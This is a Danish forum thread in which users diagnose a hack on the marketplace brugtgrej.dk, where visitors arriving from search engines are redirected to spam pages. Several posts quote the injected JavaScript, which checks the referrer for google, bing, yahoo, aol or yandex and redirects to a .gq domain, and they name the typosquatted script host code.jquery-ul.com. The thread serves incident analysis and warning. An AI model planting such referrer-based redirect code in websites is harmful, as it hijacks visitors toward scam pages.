Er BG inficeret??

Hej.
Når jeg laver en Google søgning på fx. “brugtgrej strømforsyning” og jeg så klikker på et af de links der kommer op, så bliver jeg dirigeret til en reklame spam side, der ikke har noget med BG at gøre. Det gælder på alle mine enheder PC, Iphone osv.
Laver jeg søgningen på fx. Duckduckgo istedet for og klikker på de fundne links, så virker det.

Så BG er på en eller anden måde inficeret i forhold til Google. Er der nogen der ved hvad det handler om?

Edit. Jeg bør nok nævne, at det ikke kun er hos mig problemet er. Jeg har vedhæftet et billede af, hvad det er, som der omdirigeres til.

Svar til #1:

Oplever samme problem

Svar til #1:
Send et screenshot til Føtex og skriv det som du skriver her.

73 OZ2BQ

Svar til #1:

Intet her. Slimjet Browser (Chrome variant) på Elementary OS (Ubuntu variant). Annoncer og sporing blokeret.

vh erik

Svar til #1:
Jeg rammer samme side som du beskriver her fra Mac og PC.

Svar til #1:

Tilsyneladende en trojansk hest

Svar til #1:
har samme problem på min telefon

Svar til #1:

Installer AdblockPlus og Ghostery, så er der ryddet op!

Jeg har kørt med den kombination i årevis, og kan konstatere, at det virker bare.

At Brugtgrej.dk så mister reklameindtægter, er jo bare en naturlig konsekvens, når man ikke har styr på, hvad der ligger af crap på ens server.

Mvh
Hans-Jørgen

Ja, jeg får også advarsler om, at en trojansk hest forsøger at dirigere mig til webadressen
code.jquery-ul.com på port 443
hvilket den ikke har held til med mig, da jeg kører med både Malwarebytes og Ghostery.

Svar til #1:
Ryd op på din pc !

MVH
Dan

Svar til #10:
Det er desværre ikke et lokalt fænomen. Det er Google og Brugtgrej der har et problem med hinanden.

Svar til #11:

Det er næppe Google.
Jeg forsøgte for sjovs skyld at anvende Bing på Microsofts (elendige) Edge browser uden AdblockPlus og Ghostery plugins, (her er Google slet ikke involveret), og straks ses problemet.
Det sker ikke på de andre hjemmesider jeg hurtigt prøvede.

Installer AdblockPlus og Ghostery sammen med en effektiv antivirus (jeg anvender ESET på 10. år), og lad Brugtgrej være Brugtgrej. Jeg tror ikke, at de har ressourcerne til at løse problemet.

Mvh
Hans-Jørgen

Svar til #12:
Enig..

Har prøvet med Firefox, Chrome og Google samt Edge og Bing.
Det sjove var at med den sidste kombination, troede den mærkelige side som loadede, at det var Chrome jeg brugte :-)

Svar til #13:

Jamen det er det da! https://en.wikipedia.org/wiki/Microsoft_Edge

Og når man ændre brugeragent ændre synsdromet også opførsel!

vh erik

Svar til #14:
Tak for link Erik.

Ja, til begge dele. Der kan man bare se.

Edge er skrevet med noget af sourcekoden fra Chrome og den seneste har kodenavnet, Anaheim (2019–present).

Svar til #1:

Har kigget lidt på det og fundet ud af følgende:

Det allerallerførste i deres html er:
- og det kommer _før_ deres .

Det tyder på det er indsat at nogle hackere som har fået adgang til det et eller andet sted.

Men, nu sidder man og tror de er JQuery UI den loader. Men, det er JQUERY-UL der står. Som, hvis man bruger jquery-ul.com får man en russisk side.

Men kalder man selve den url de har indsat, altså https://code.jqeury-ul.com/jquery-ui.js så får man det korrekte jquery-ui.js javascript serveret. Dog med en lille tilføjelse til sidst i filen, at _HVIS_ du kommer fra google, yahoo, yandex, bing eller aol, så bliver du viderestillet til http://concieceisaxag.tk/index/?Bkm9gr - sikkert med en ny "kode" efter ? fra tid til anden. Det er så den side som viser reklamerne.

Så, de skal finde ud af hvordan det der script er havnet i deres kode, og de skal få det fjernet.


("de" i denne sammenhæng er brugtgrej.dk)

Svar til #1:

Ja., brugtgrej.dk ER inficeret. Der har været hackere på spil og pillet ved koden.

Peter

Svar til #1:

Ingen problemer - linken jeg trykker viser en annonce med "Annoncen blev ikke fundet.".

Svar til #1:

Er det følgende der er problemet?:

https://www.computerworld.dk/art/254668/browser- udvidelser-til-facebook-og-instagram-inf iceret-med-malware-afinstaller-nu

Svar til #19:
Problemet er også på IOS som ikke kan inficeres, så nej det tror jeg ikke.

Svar til #20:

Hej Per

Prøv at overveje, hvorfor det kun optræder i forbindelse med gogglesøgninger (og de aflagte gogglesøgninger, duck, duck og lign), når det ikke forekommer, ved direkte adgang i adressefeltet eller etablerede genveje.
Kan det have sammenhæng med goggles nedbrud for 5 dage siden? Altså i googles indekseringer???

Jeg kan forøvrigt heller ikke få fremprovokeret fejlen ved søgning med ikkegoogle relaterede søgemaskiner. De findes faktisk stadig ;-)

Reklamer, hvorfor netop lige reklamer på BG, når der tilsyneladende ikke er infektion på f. eks elgiganten. Hvad er det, der gør BG speciel????

Svar til #1:
Tak til dig hhv. øvrige her på tråden der har gjort opmærksom på forholdet hhv. givet råd/vejledning om hvordan problemet løses. Jeg benytter selv Firefox/Chrome, søger jeg via GOOGLE på et ældre indlæg på brugtgrej.dk´s forum oplever jeg det samme.
For ca. et år siden hoppede en mig god bekendt i fælden og besvarede flere af de stillede spørgsmål, disse var dog ikke fra Føtex men noget lignende, præmien var en spritny mobiltlf. af den kostbare slags. Efterfølgende blev pågældende kimet ned af en person, der med forskellige identiteter oplyste at præmien af opkalderens chef var konverteret til at tilbyde et gratis eftersyn af vedkommendes PC. Samtlige af disse opkald blev foretaget fra forskellige mobiltlf. numre. Ved opkald til disse fik man et autosvar der blot meddelte at man ikke kunne ringe dertil. Opkalderen var ret aggressiv. Efter nogle måneder stoppede disse opkald dog. Heldigvis havde min bekendt kun oplyst sit (hemmelige/udeladte) tlf. nummer og ikke sin adresse, han afbrød nemlig processen (at besvare samtlige spørgsmål). Det er grove løjer det her.

Svar til #21:

Hvis i nu læser hvad Mads skriver i #16 - så HAR i fået forklaringen på problemet.

Det er slutningen af det script der er først på siden, og som indeholder følgende:

var s=document.referrer;
if(s.indexOf("google")>0 || s.indexOf("bing")>0 || s.indexOf("aol")>0 || s.indexOf("yahoo")>0 || s.indexOf("yandex")>0)
{
window.location.replace("http://erphomemlierio.gq/index/?Bkm9gr");
}

Som i kan se handler det om hvilke søgemaskiner man kommer fra, og ja det skyldes et hackerangreb.

Brugtgrej's admin HAR anerkendt fejlen, og får den rettet asap.

Slut på denne tråd.

Peter

Svar til #12:

Hvad er der galt med Microsoft ( elendige ) browser. Jeg har brugt den siden starten og den virker aldeles glimrende. Måske du har et andet problem med din windows.

Svar til #1:
Hvad (hvem) er egentlig "code.jquery-ul.com"?
Det er noget som brugtgrej åbenbart gerne vil have skal køre (eller hvad?). Hos mig har det bare hele tiden været spærret globalt per default.
Hos dnslytics.com ser jeg kun at det er hosted af cloudflare?

Svar til BG

Forslag:
Fremfor at referere direkte til det jQuery library I anvender, se vedhæftede, vil jeg foreslå at i downloader dem og refererer til dem lokalt på brugtgrej.dk. Så slipper i for bøvl som det der diskuteres her i tråden. Bonus oveni er at I også i undgår at blive ramt af fejl/kompatibilitetsproblemer når jQuery opdateres :-)

Svar til #26 og #25:

Som det allerede er nævnt nogle gange, så er det er et hackerangreb. Det er ikke jQuery der linkes til og koden er ikke indsat af nogen fra brugtgrej teamet.

"Nogen" er kommet ind via baggdør og har indsat koden der referer til en russisk side i alle php filerne på bg's server.
Det skal blot pilles ud, og sikkerhedshullet skal lukkes hvis det ikke allerede er blevet det.

Peter

Svar til #1:
Jeg får ofte denne meddelelse når jeg 'bevæger mig rundt' på BG's sider, se vedhæftede.

Svar til #27:
Det har du ganske ret i, linket er ikke det korrekte til jquery.

Svar til #28:

Hej Jan

Jep, det er lige præcis den som er problemet. Fint du har et program der blokerer det.

Hvor lang tid har du fået den fejlmeddelelse? vi ved ikke hvor længe bg har været inficeret med det - men de har vidste det nu i 2 døgn og fejlen er stadig ikke fjernet. Det skuffer mig noget... det er efte rmin mening en ret alvorlig ting når så besøgt en hjemmeside er ramt.

Peter

Svar til #30:
Jeg mener helt bestemt at problemet har været her i alle fald over 2 dage. Jeg mener også at det har været nævnt tidligere i et forumindlæg. Så det er tilladt at 'rydde op i BG' et eller andet sted i systemet.

Edit, tilføjet: Læs mere her..
https://wizardofvegas.com/forum/off-topic/gripes /35321-trojan/

Svar til

det må være den her
https://ham.brugtgrej.dk/forum.php?mode=thread&o bj=84242

Svar til #32:
Jeg har lige installeret den ny Avarst , og først nu laver den ballade når jeg bruger google og føler linket ,nægter virus program at gå ind på siden grundet piercing ,
ingen problem hvis jeg går direkte til brugtgrej.dk

Svar til #33:

Det er så ikke Google, der er problemet. Jeg får også en advarsel fra mit antivirusprogram, hvis jeg bruger Bing søgemaskine og klikker på et link til BG.

Og prøv at installere https://www.malwarebytes.com/ i prøveversionen. Medmindre fejlen er rettet siden søndag, så kommer den op med en advarsel om en trojansk hest, hver gang man tilgår BGs sider - også direkte.

Til tråden:

Her er hvad jeg får når jeg bruger BING:
Går jeg direkte til BG er der ingen problemer.

73' OZ2BQ

Svar til #34, 35 m.fl:

Som jeg ser det! Jeg ved næsten intet om det ellers.
Fejlen ligger hos Brugtgrej, og viser sig når man kommer fra forskellige søgemaskiner til Brugtgrej. Fejlen årsag ser i hvis i beder jeres browser om at vise sidens kildetekst. På første linie i kildeteksten står der en script kode med en falsk Java Script link, altså det der står inden det officielle html dokument starter med DOCTYPE tag'et. Hvis i følger dette link i kildeteksten ved at klikke på det kommer i til en side med en java script. Den sidste del af denne script, startende ved var s, sender os videre til den internet adresse der står allersidst i scriptet hvis vi kommer fra en af de søgemaskiner der er nævn i var s. Og det er den "farlige" del af scriptet, og dermed også den usikre/inficeret del af besøg på brugtgrej.dk

vh erik

Svar til #36:
Det er fint alt sammen. Fejlen er fundet, der er lagt et malware script ind på brugtgrej.dk. Men hvorfor er det ikke fjernet endnu? Brugtgrej må da have en interesse i at hoste en ren hjemmeside.
Det kan da ikke være så svært at slette et par kode linjer?

Problemet kan være at lukke det hul der i første omgang har muliggjort at plante malware. Det er mindst lige så vigtigt.

Svar til #37:
Hmm. Er der nogen der har prøvet at kontakte admin om dette problem ?
Hvis Admin ikke umiddelbart læser med, ved denne måske ikke at der er udfordringer.

God Jul
Carsten Nielsen

Svar til #39:
Mon ikke ADMIN læser med, de plejer at være pænt hurtige til at slette indlæg, eller lukke tråde, hvis indholdet ikke lige falder i deres smag.
Desværre er fejlen endnu ikke rettet.
Læren må være ikke at besøge BG via links på søgemaskiner, eller bedre: Helt holde sig væk, der er heldigvis andre steder man kan købe og sælge grej.
Glædelig Jul ????

Indlæggets indhold er fjernet af mig selv.

Svar til #41:
Hej Kim.
Se indlæg 16 her er problemet beskrevet, det er kun Google, Bing og et par andre søgemaskiner der er skrevet ind i malwarekoden på BG’s server.
Så jo det er desværre Brugtgrej der er inficeret med “skadelig” kode.

Svar til #42:

Ok. Jeg fjerner indholdet i mit indlæg, indlægget kan kun admin fjerne.

Svar til #23:

Allerøverst i kildeteksen - set via firefox ( view-source:https://www.brugtgrej.dk/ ) står der (fjernet større-end og mindre-end tegn):
"script src="https://code.jquery-ul.com/jquery-ui.js" /script"

Er det heri følgende står/stod?:

var s=document.referrer;
if(s.indexOf("google")>0 || s.indexOf("bing")>0 || s.indexOf("aol")>0 || s.indexOf("yahoo")>0 || s.indexOf("yandex")>0)
{
window.location.replace("hzzp://erphomemlierio.gq/index/?Bkm9gr");
}

Faktisk er det "forbudt" at placere et script-tag der:
https://validator.w3.org/nu/?showsource=yes&user agent=Validator.nu%2FLV+http%3A%2F%2Fval idator.w3.org%2Fservices&acceptlanguage= &doc=https%3A%2F%2Fham.brugtgrej.dk%2F

https://sitecheck.sucuri.net/results/https/ham.b rugtgrej.dk
Citat: "... Known javascript malware..."

virustotal.com viser at kun trustwire angiver urlen ( hzzp://erphomemlierio.gq/index/?Bkm9gr ) som skadelig:
https://www.virustotal.com/gui/url/8d17c070358a8 f0715828d42721a1474900583a17315ef89ae5bf 2c6d1e0e6f0/detection
https://sitecheck.sucuri.net/results/erphomemlie rio.gq/index/?q=Bkm9gr

-

Relateret:

Artikel muligvis fra omkring år 2000:
Rik Farrow: PATCHING SYSTEMS
http://web.archive.org/web/20100102144854/http: //spirit.com/Network/net0200.html
http://www.spirit.com/Network/net0200.html
Citat: "...
Sidebar: The Danger of Active Scripting
...
One of Smith's sources, Georgi Guninski of Bulgaria, began posting other flaws in Internet Explorer and Outlook in September, and has posted almost one a week since then. This has contributed to the large number of Microsoft security advisories, as Microsoft dutifully puts out patches.
...
I had disabled Java and Java Script in my versions of Netscape Navigator years ago, and suggest that you do likewise. Disabling Active Scripting will occasionally cause you problems, especially on Microsoft sites, as they use it liberally. What would truly be nice would be if the browser vendors would make it possible to enable/disable scripting with a button right on the menu bar, so you don't have to go digging through layers of menus. This button should always be visible, and show when Active Scripting is enabled by flashing red (or something equally unmissable). The browser should be configurable so that Active Scripting can automatically be disabled as soon as you leave the site where you had it enabled (so that you can forget, and the browser will turn off Active Scripting for you).
Active Scripting is a useful extension to the Web, but it is also a very dangerous one. You give control of your system to remote Web sites and to anyone who sends you email if you use Outlook, Outlook Express, or Netscape Navigator to read you email.
..."

CERT® Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests
This advisory is being published jointly by the CERT Coordination Center, DoD-CERT, the DoD Joint Task Force for Computer Network Defense (JTF-CND), the Federal Computer Incident Response Capability (FedCIRC), and the National Infrastructure Protection Center (NIPC).
Original release date: February 2, 2000
Last revised: February 3, 2000:
http://web.archive.org/web/20100309092132/http: //www.cert.org/advisories/CA-2000-02.htm l
Citat: "...
A web site may inadvertently include malicious HTML tags or script in a dynamically generated page based on unvalidated input from untrustworthy sources. This can be a problem when a web server does not adequately ensure that generated pages are properly encoded to prevent unintended execution of scripts, and when input is not validated to prevent malicious HTML from being presented to the user.
..."

31st July 2013, Malicious JavaScript flips ad network into rentable botnet
Enslaved machines helplessly press Apache's buttons
http://www.theregister.co.uk/2013/07/31/whiteha t_security_ad_networks_botnet/

Svar til #40:

Jeg skrev til dem for en uge siden, d. 18. ang. problemet. De takkede for hjælpen og lovede at få ordnet det.

P.t. er der stadig intet sket! Det er ikke imponerende i betragtning af at det tager et øjeblik at rette fejlen, og problemet har eksisteret i over en måned.

Vi må da håbe ingen falder i fælden og bliver snydt, for ellers får BG da et problem da de ER vidende om problemet.
Samtidig er det da ærgerligt at folk ikke kan tilgå BG fra en søgemaskine. Jeg syntes sådan noget er en ret alvorlig sag, men det er åbenbart kun mig...!

Peter

Hvis jeg husker rigtig, så er fænomenet ikke nyt! Det dukkede op hos os på en stor polsk side, (wp.pl eller o2.pl tror jeg det var) for cirka 2 år siden, og derfør andre steder en sjældent gang. Den polske side døjede med det i en uges tid, så det er åbenbart ikke så enkelt at slippe af med. Hvor "farlig" fænomenet er har jeg ingen anelse om. Og det er ikke et fænomen det flyder over med advarsler imod på nettet!

vh erik

Admin hos brugtgrej har nu meddelt at fejlen er rettet.

Så det er jo godt.

Siden kan nu igen tilgås fra google m.m.

Peter